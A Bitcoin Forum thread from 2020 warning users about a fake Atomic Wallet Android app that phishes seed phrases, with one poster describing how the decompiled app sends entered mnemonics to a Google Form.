Bitcoin Forum
November 14, 2024, 04:48:35 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: [SCAM] Fake Atomic wallet phishing app  (Read 147 times)
dkbit98 (OP)
Legendary
*
Offline Offline

Activity: 2422
Merit: 7572



View Profile WWW
July 09, 2020, 01:29:36 PM
 #1

What happened: Fake Atomic Wallet app that is phishing for your seed words and private key.
Do NOT download and install this!
REPORT IT

Website:
Code:
https://play.google.com/store/apps/details?id=com.atomicwallet.atomicwalletmanager
Archive: http://archive.vn/jD5tw
ANN:not found





Real and original Atomic wallet app is only this:
https://play.google.com/store/apps/details?id=io.atomicwallet

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
Casdinyard
Hero Member
*****
Offline Offline

Activity: 2184
Merit: 891


Leading Crypto Sports Betting and Casino Platform


View Profile
July 09, 2020, 01:53:17 PM
 #2

~

FLAG SUPPORTED!

I've also looked at the fake app's permission and it was too suspicious as it only requires full network access permission while most wallets needs almost everything, and the fake wallet app's features contradicts it's permission required. Also, its file size seems to only need its phishing activities to run as crypto wallet.


Good catch op!

..Stake.com..   ▄████████████████████████████████████▄
   ██ ▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄ ██  ▄████▄
   ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██  ██████
   ██ ██████████ ██      ██ ██████████ ██   ▀██▀
   ██ ██      ██ ██████  ██ ██      ██ ██    ██
   ██ ██████  ██ █████  ███ ██████  ██ ████▄ ██
   ██ █████  ███ ████  ████ █████  ███ ████████
   ██ ████  ████ ██████████ ████  ████ ████▀
   ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██
   ██            ▀▀▀▀▀▀▀▀▀▀            ██ 
   ▀█████████▀ ▄████████████▄ ▀█████████▀
  ▄▄▄▄▄▄▄▄▄▄▄▄███  ██  ██  ███▄▄▄▄▄▄▄▄▄▄▄▄
 ██████████████████████████████████████████
▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄
█  ▄▀▄             █▀▀█▀▄▄
█  █▀█             █  ▐  ▐▌
█       ▄██▄       █  ▌  █
█     ▄██████▄     █  ▌ ▐▌
█    ██████████    █ ▐  █
█   ▐██████████▌   █ ▐ ▐▌
█    ▀▀██████▀▀    █ ▌ █
█     ▄▄▄██▄▄▄     █ ▌▐▌
█                  █▐ █
█                  █▐▐▌
█                  █▐█
▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█
▄▄█████████▄▄
▄██▀▀▀▀█████▀▀▀▀██▄
▄█▀       ▐█▌       ▀█▄
██         ▐█▌         ██
████▄     ▄█████▄     ▄████
████████▄███████████▄████████
███▀    █████████████    ▀███
██       ███████████       ██
▀█▄       █████████       ▄█▀
▀█▄    ▄██▀▀▀▀▀▀▀██▄  ▄▄▄█▀
▀███████         ███████▀
▀█████▄       ▄█████▀
▀▀▀███▄▄▄███▀▀▀
..PLAY NOW..
409H
Newbie
*
Offline Offline

Activity: 7
Merit: 4


View Profile WWW
July 10, 2020, 12:48:15 AM
 #3

I have decompiled the APK and reported to AtomicWallet via Twitter DM

The app loads a local HTML file into a webview and asks for mnemonic phrases which then sends to a Google Form (https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform)
Casdinyard
Hero Member
*****
Offline Offline

Activity: 2184
Merit: 891


Leading Crypto Sports Betting and Casino Platform


View Profile
July 10, 2020, 02:02:35 PM
 #4

I have decompiled the APK and reported to AtomicWallet via Twitter DM

The app loads a local HTML file into a webview and asks for mnemonic phrases which then sends to a Google Form (https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform)

Can you indicate here the apk codes that has the line that leads to that file? Knowing that it redirects to a google form then sends to the attacker wouldn't be enough, evidences such as screenshots or the real code will do.. The file you've indicated only is I guess a dummy file form. If they would use google, wouldn't it be that hard and difficult to link due to security measures of google?

Now I see why they only need network access permission, so that they could redirect the user's phrases input in the fake app.

..Stake.com..   ▄████████████████████████████████████▄
   ██ ▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄ ██  ▄████▄
   ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██  ██████
   ██ ██████████ ██      ██ ██████████ ██   ▀██▀
   ██ ██      ██ ██████  ██ ██      ██ ██    ██
   ██ ██████  ██ █████  ███ ██████  ██ ████▄ ██
   ██ █████  ███ ████  ████ █████  ███ ████████
   ██ ████  ████ ██████████ ████  ████ ████▀
   ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██
   ██            ▀▀▀▀▀▀▀▀▀▀            ██ 
   ▀█████████▀ ▄████████████▄ ▀█████████▀
  ▄▄▄▄▄▄▄▄▄▄▄▄███  ██  ██  ███▄▄▄▄▄▄▄▄▄▄▄▄
 ██████████████████████████████████████████
▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄
█  ▄▀▄             █▀▀█▀▄▄
█  █▀█             █  ▐  ▐▌
█       ▄██▄       █  ▌  █
█     ▄██████▄     █  ▌ ▐▌
█    ██████████    █ ▐  █
█   ▐██████████▌   █ ▐ ▐▌
█    ▀▀██████▀▀    █ ▌ █
█     ▄▄▄██▄▄▄     █ ▌▐▌
█                  █▐ █
█                  █▐▐▌
█                  █▐█
▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█
▄▄█████████▄▄
▄██▀▀▀▀█████▀▀▀▀██▄
▄█▀       ▐█▌       ▀█▄
██         ▐█▌         ██
████▄     ▄█████▄     ▄████
████████▄███████████▄████████
███▀    █████████████    ▀███
██       ███████████       ██
▀█▄       █████████       ▄█▀
▀█▄    ▄██▀▀▀▀▀▀▀██▄  ▄▄▄█▀
▀███████         ███████▀
▀█████▄       ▄█████▀
▀▀▀███▄▄▄███▀▀▀
..PLAY NOW..
409H
Newbie
*
Offline Offline

Activity: 7
Merit: 4


View Profile WWW
July 10, 2020, 02:29:21 PM
 #5

I have decompiled the APK and reported to AtomicWallet via Twitter DM

The app loads a local HTML file into a webview and asks for mnemonic phrases which then sends to a Google Form (https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform)

Can you indicate here the apk codes that has the line that leads to that file? Knowing that it redirects to a google form then sends to the attacker wouldn't be enough, evidences such as screenshots or the real code will do.. The file you've indicated only is I guess a dummy file form. If they would use google, wouldn't it be that hard and difficult to link due to security measures of google?

Now I see why they only need network access permission, so that they could redirect the user's phrases input in the fake app.

For sure. They use the GoogleForm to host the submitted data, but have a custom HTML view to make it look more legitimate

https://i.imgur.com/JAIiQ9L.png
https://i.imgur.com/jWoXYcU.png

Here's a video of me running the webviewed HTML file on a local server: https://youtu.be/-Z00p-l5KIM
sujonali1819
Legendary
*
Offline Offline

Activity: 2450
Merit: 1189


Need Campaign Manager?PM on telegram @sujonali1819


View Profile WWW
July 10, 2020, 02:54:36 PM
 #6

Website:
Code:
https://play.google.com/store/apps/details?id=com.atomicwallet.atomicwalletmanager
It seems the link showing error. Maybe it removed from google play store. It's really a good job by google.

Actually, scams are everywhere nowadays. And it really very hard to alive on the internet for some unaware people. And these types of fake wallets play a vital role to stop them. So we have to aware of it and we should report these wallets ASAP after seeing.

.
.BLACKJACK ♠ FUN.
█████████
██████████████
████████████
█████████████████
████████████████▄▄
░█████████████▀░▀▀
██████████████████
░██████████████
████████████████
░██████████████
████████████
███████████████░██
██████████
CRYPTO CASINO &
SPORTS BETTING
.
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!